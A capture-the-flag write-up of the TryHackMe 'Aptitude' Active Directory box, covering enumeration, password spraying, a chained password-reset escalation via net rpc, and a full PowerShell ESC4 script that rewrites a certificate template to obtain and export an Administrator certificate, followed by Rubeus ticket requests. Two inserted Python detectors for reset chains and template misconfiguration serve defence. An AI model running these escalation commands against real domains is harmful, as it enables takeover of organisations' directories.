---
title: 'THM Industrial CTF Aptitude box writeup '
---
THM Industrial CTF Aptitude writeup
===
## Table of Contents
[TOC]
# Foothold
## Description
As we make our way deep into the Virelia Water Control Facility, we encounter a target that can alter the course of battle. ZeroTrace is the only one that can see the forest through the trees and successfully breach the target's domain. However, the target knows ZeroTrace is ready for attack and will not go down without a fight.
> We can deduce that some user(s) have the ability to change attributes of other users.
Recon
---
```
└─$ nmap -Pn -sCV 10.10.93.74
Nmap scan report for 10.10.93.74
Host is up (0.081s latency).
Not shown: 991 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: aptitude.thm0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.aptitude.thm
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.aptitude.thm
| Not valid before: 2025-05-15T05:15:57
|_Not valid after: 2026-05-15T05:15:57
|_ssl-date: 2025-06-29T16:07:35+00:00; -2s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: aptitude.thm0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.aptitude.thm
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.aptitude.thm
| Not valid before: 2025-05-15T05:15:57
|_Not valid after: 2026-05-15T05:15:57
|_ssl-date: 2025-06-29T16:07:35+00:00; -2s from scanner time.
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC01.aptitude.thm
| Not valid before: 2025-05-13T20:40:11
|_Not valid after: 2025-11-12T20:40:11
|_ssl-date: 2025-06-29T16:07:35+00:00; -2s from scanner time.
| rdp-ntlm-info:
| Target_Name: APTITUDE
| NetBIOS_Domain_Name: APTITUDE
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: aptitude.thm
| DNS_Computer_Name: DC01.aptitude.thm
| DNS_Tree_Name: aptitude.thm
| Product_Version: 10.0.17763
|_ System_Time: 2025-06-29T16:06:55+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-06-29T16:06:56
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: -1s, deviation: 0s, median: -2s
```
> Normal Active Directory ports, with RDP and WinRM exposed.
> Notice that port 88 (Kerberos) is not present, and neither is the default LDAP port 389 (only the Global Catalog ports 3268/3269 are open).
> SMB signing is enabled and required.
```
Domain : aptitude.thm
DC : DC01.aptitude.thm
```
```
└─$ nxc smb 10.10.93.74 -u guest -p '' --shares
SMB 10.10.93.74 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:aptitude.thm) (signing:True) (SMBv1:False)
SMB 10.10.93.74 445 DC01 [+] aptitude.thm\guest:
SMB 10.10.93.74 445 DC01 [*] Enumerated shares
SMB 10.10.93.74 445 DC01 Share Permissions Remark
SMB 10.10.93.74 445 DC01 ----- ----------- ------
SMB 10.10.93.74 445 DC01 ADMIN$ Remote Admin
SMB 10.10.93.74 445 DC01 C$ Default share
SMB 10.10.93.74 445 DC01 IPC$ READ Remote IPC
SMB 10.10.93.74 445 DC01 it READ For IT Employees
SMB 10.10.93.74 445 DC01 NETLOGON Logon server share
SMB 10.10.93.74 445 DC01 SYSVOL Logon server share
```
> Read access on the non-standard share `it`; inside it we find welcome.pdf.

> The obvious move is to use Reberto with the password found to list the other domain users and spray that password.
> We find another user with the same password: arlina.
- We now use the user we have to enumerate the domain further with `ldapdomaindump`
```
└─$ ldapdomaindump -u 'aptitude.thm\arlina' -p 'Default_2025!' 10.10.93.74:3268
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
```
+ Open the domain_users.html file

> arlina can RDP
+ We will log in via *xfreerdp* and enumerate further with SharpHound.
+ First, transfer your SharpHound.exe binary to the target machine
+ After you get the output, transfer it back to your machine
```
.\SharpHound.exe -c All -d aptitude.thm
```

SharpHound/BloodHound reveals a chain of users who can reset each other's passwords: `arlina => phedra => mary-ann => itadmin`
```
net rpc password "PHEDRA" "newP@ssword2022" -U "aptitude.thm"/"arlina"%'Default_2025!' -S "dc01.aptitude.thm"
net rpc password "MARY-ANN" "newP@ssword2022" -U "aptitude.thm"/"PHEDRA"%'newP@ssword2022' -S "dc01.aptitude.thm"
net rpc password "ITADMIN" "newP@ssword2022" -U "aptitude.thm"/"MARY-ANN"%'newP@ssword2022' -S "dc01.aptitude.thm"
```
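A defender-side counterpart to the reset chain above, added here as an example that is not part of the original writeup: it links Event ID 4724 (password reset attempts) into chains where each freshly reset account performs the next reset shortly afterwards. The log lines, their simplified CSV layout and the 30-minute window are constructed assumptions.

```python
"""Flag runs of Event ID 4724 (an attempt was made to reset an account's
password) in which the account whose password was just reset becomes the
actor of the next reset within a short window. The log lines below are
CONSTRUCTED for this example, in a simplified
'EventID,Time,SubjectUserName,TargetUserName' layout, not real EVTX output."""
from datetime import datetime, timedelta

SAMPLE_LOG = """\
4724,2025-06-29T09:00:00,helpdesk1,jdoe
4724,2025-06-29T16:10:02,arlina,phedra
4624,2025-06-29T16:10:20,phedra,-
4724,2025-06-29T16:10:40,phedra,mary-ann
4724,2025-06-29T16:11:15,mary-ann,itadmin
4724,2025-06-29T18:45:00,jdoe,bob
"""

def parse_4724(text):
    """Return (time, subject, target) tuples for 4724 events, oldest first."""
    events = []
    for line in text.splitlines():
        event_id, ts, subject, target = line.split(",")
        if event_id == "4724":   # other event IDs (e.g. 4624 logons) are ignored
            events.append((datetime.fromisoformat(ts), subject.lower(), target.lower()))
    return sorted(events)

def _is_subpath(short, long):
    """True if `short` is a strictly shorter contiguous run inside `long`."""
    n = len(short)
    return n < len(long) and any(long[i:i + n] == short for i in range(len(long) - n + 1))

def find_reset_chains(events, window_minutes=30, min_hops=2):
    """Link resets where the previous target is the next subject within the window.
    Returns the maximal chains as account paths, actor first (A -> B -> C)."""
    window = timedelta(minutes=window_minutes)
    chains = []                      # each chain is a list of 4724 events
    for ev in events:
        time, subject, _target = ev
        extended = [c + [ev] for c in chains
                    if c[-1][2] == subject and time - c[-1][0] <= window]
        chains.extend(extended)
        chains.append([ev])          # every reset may start a new chain
    paths = [[c[0][1]] + [e[2] for e in c] for c in chains if len(c) >= min_hops]
    return [p for p in paths if not any(_is_subpath(p, q) for q in paths)]

if __name__ == "__main__":
    for path in find_reset_chains(parse_4724(SAMPLE_LOG)):
        print("ALERT chained password resets:", " -> ".join(path))
```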
+ We can now log in as itadmin and get user.txt

# Privilege Escalation
+ Service enumeration, manual enumeration and credential hunting yield nothing, so we check Active Directory Certificate Services
> Note that Certipy (run remotely) times out because some of the ports are blocked
```powershell
PS C:\Users\itadmin> certutil -template
```
+ Reading the output carefully, we notice that *itadmin* has full control over the template *ITUser*, which is a classic [ESC4](https://www.hackingarticles.in/adcs-esc4-vulnerable-certificate-template-access-control/) misconfiguration
+ We exploited it manually from inside the box

+ Following this reference: [ADCSESC4](https://bloodhound.specterops.io/resources/edges/adcs-esc4#step-1%3A-ensure-the-certificate-template-allows-for-client-authentication)
+ The script below modifies the template, requests a certificate for the Administrator account and exports it as a PFX
```powershell
# Target template and the principal holding full control over it (see the certutil output above)
$templateName  = "ITUser"
$principalName = "itadmin"

# Locate the template object under the Configuration naming context
$rootDSE  = New-Object DirectoryServices.DirectoryEntry("LDAP://RootDSE")
$template = [ADSI]"LDAP://CN=$templateName,CN=Certificate Templates,CN=Public Key Services,CN=Services,$($rootDSE.configurationNamingContext)"

# Step 1: make sure the template is usable for client authentication (EKU 1.3.6.1.5.5.7.3.2).
# Get() returns a bare string for a single-valued attribute, so wrap it in @() before appending.
$clientAuthEKU = "1.3.6.1.5.5.7.3.2"
$currentEKUs   = @($template.Get("pKIExtendedKeyUsage"))
if ($currentEKUs -notcontains $clientAuthEKU) {
    $newEKUs = [string[]]($currentEKUs + $clientAuthEKU)
    $template.Put("pKIExtendedKeyUsage", $newEKUs)
}

# Step 2: let the enrollee supply the subject/SAN (CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1)
$currentFlags = $template.Get("msPKI-Certificate-Name-Flag")
$newFlags     = $currentFlags -bor 0x00000001
$template.Put("msPKI-Certificate-Name-Flag", $newFlags)

# Step 3: clear manager approval (CT_FLAG_PEND_ALL_REQUESTS = 0x2) and require no authorized signatures
$currentEnrollFlags = $template.Get("msPKI-Enrollment-Flag")
$newEnrollFlags     = $currentEnrollFlags -band (-bnot 0x00000002)
$template.Put("msPKI-Enrollment-Flag", $newEnrollFlags)
$template.Put("msPKI-RA-Signature", 0)
$template.SetInfo()

# Step 4: certreq INF asking for a certificate that carries Administrator's UPN in the SAN
@"
[NewRequest]
Subject = "CN=Administrator"
KeySpec = 1
KeyLength = 2048
Exportable = TRUE
MachineKeySet = FALSE
SMIME = FALSE
PrivateKeyArchive = FALSE
UserProtected = FALSE
UseExistingKeySet = FALSE
ProviderName = "Microsoft RSA SChannel Cryptographic Provider"
ProviderType = 12
RequestType = PKCS10
KeyUsage = 0xa0
[Extensions]
2.5.29.17 = "{text}"
_continue_ = "upn=Administrator@aptitude.thm&"
[RequestAttributes]
CertificateTemplate = ITUser
SAN = upn:Administrator@aptitude.thm
"@ | Out-File -FilePath "esc4_admin.inf" -Encoding ASCII

# Step 5: generate, submit and install the request; the issued certificate lands in Cert:\CurrentUser\My
certreq -new esc4_admin.inf esc4_admin.req
certreq -submit esc4_admin.req esc4_admin.cer
certreq -accept esc4_admin.cer

# Step 6: export the newest Administrator certificate together with its private key as a PFX
$adminCert = Get-ChildItem -Path "Cert:\CurrentUser\My" |
    Where-Object { $_.Subject -eq "CN=Administrator" } |
    Sort-Object NotBefore -Descending |
    Select-Object -First 1
if ($adminCert) {
    $password = ConvertTo-SecureString -String "ESC4Attack!" -Force -AsPlainText
    Export-PfxCertificate -Cert $adminCert -FilePath "admin_esc4.pfx" -Password $password
}

# Step 7 (optional): explicit issuer/subject mapping on the Administrator object. This needs write access
# to that object; the UPN in the SAN already maps the certificate implicitly. altSecurityIdentities values
# must carry the "X509:" prefix and list the DN components in reverse order (root first).
$adminUser   = [ADSI]"LDAP://CN=Administrator,CN=Users,DC=aptitude,DC=thm"
$certMapping = "X509:<I>DC=thm,DC=aptitude,CN=aptitude-DC01-CA-2<S>CN=Administrator"
$adminUser.Put("altSecurityIdentities", @($certMapping))
$adminUser.SetInfo()
```
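An audit of the template attributes the script above changes, added as an example that is not part of the writeup: it flags a template in the post-edit state (enrollee supplies the SAN, authentication EKU, no approval or signature gate) and any non-admin principal holding write rights over it. The template records, their plain-dict field layout and the flag values are constructed assumptions; a real audit would read them from the Configuration partition over LDAP.

```python
"""Audit certificate-template attributes for the state an ESC4 edit produces.
Template records are CONSTRUCTED for this example, not read from a live DC."""

CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001   # bit in msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002           # bit in msPKI-Enrollment-Flag (manager approval)
AUTH_EKUS = {"1.3.6.1.5.5.7.3.2",       # Client Authentication
             "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
             "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
             "2.5.29.37.0"}             # Any Purpose
WRITE_RIGHTS = {"GenericAll", "WriteDacl", "WriteOwner", "WriteProperty"}
PRIVILEGED = {"Domain Admins", "Enterprise Admins", "Administrators"}

def audit_template(t):
    """Return a list of finding strings; an empty list means no ESC1/ESC4 indicator."""
    findings = []
    ekus = set(t.get("pKIExtendedKeyUsage", []))
    usable_for_auth = not ekus or bool(ekus & AUTH_EKUS)   # no EKU at all means any purpose
    supplies_san = bool(t["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT)
    approval = bool(t["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS)
    signatures = t.get("msPKI-RA-Signature", 0) > 0
    if usable_for_auth and supplies_san and not approval and not signatures:
        findings.append("ESC1: enrollee-supplied SAN on an authentication template with no approval or signature gate")
    for principal, right in t.get("acl", []):     # constructed (principal, right) pairs stand in for the DACL
        if right in WRITE_RIGHTS and principal.split("\\")[-1] not in PRIVILEGED:
            findings.append(f"ESC4: {principal} holds {right} over the template")
    return findings

# ITUser as it might have looked before the edit (constructed values; bit 0 of the name flag is clear)
ITUSER_BEFORE = {
    "name": "ITUser",
    "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
    "msPKI-Certificate-Name-Flag": 0x82000000,
    "msPKI-Enrollment-Flag": 0x00000022,        # includes CT_FLAG_PEND_ALL_REQUESTS
    "msPKI-RA-Signature": 1,
    "acl": [("APTITUDE\\Domain Admins", "GenericAll"), ("APTITUDE\\itadmin", "GenericAll")],
}
# The same template after the three attribute changes the script makes
ITUSER_AFTER = {**ITUSER_BEFORE, "msPKI-Certificate-Name-Flag": 0x82000001,
                "msPKI-Enrollment-Flag": 0x00000020, "msPKI-RA-Signature": 0}

if __name__ == "__main__":
    for tmpl in (ITUSER_BEFORE, ITUSER_AFTER):
        print(tmpl["name"], audit_template(tmpl) or ["no findings"])
```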
+ Then grab the thumbprint
```powershell
Get-ChildItem -Path "Cert:\CurrentUser\My" | Select-Object Subject, Thumbprint, HasPrivateKey
```
+ Request a TGT with Rubeus
```powershell
.\rub.exe asktgt /user:Administrator /certificate:<Thumbprint> /domain:aptitude.thm /dc:<dc-ip> /ptt
```


+ The final step is to use the ticket
> Note that psexec didn't work
```powershell
winrs -r:DC01.aptitude.thm cmd
```

# Credits
+ Team: Toasters
+ d3vnu11 [HackTheBox](https://app.hackthebox.com/users/1414638)
+ ʎɐsǝǝu [HackTheBox](https://app.hackthebox.com/profile/1725001)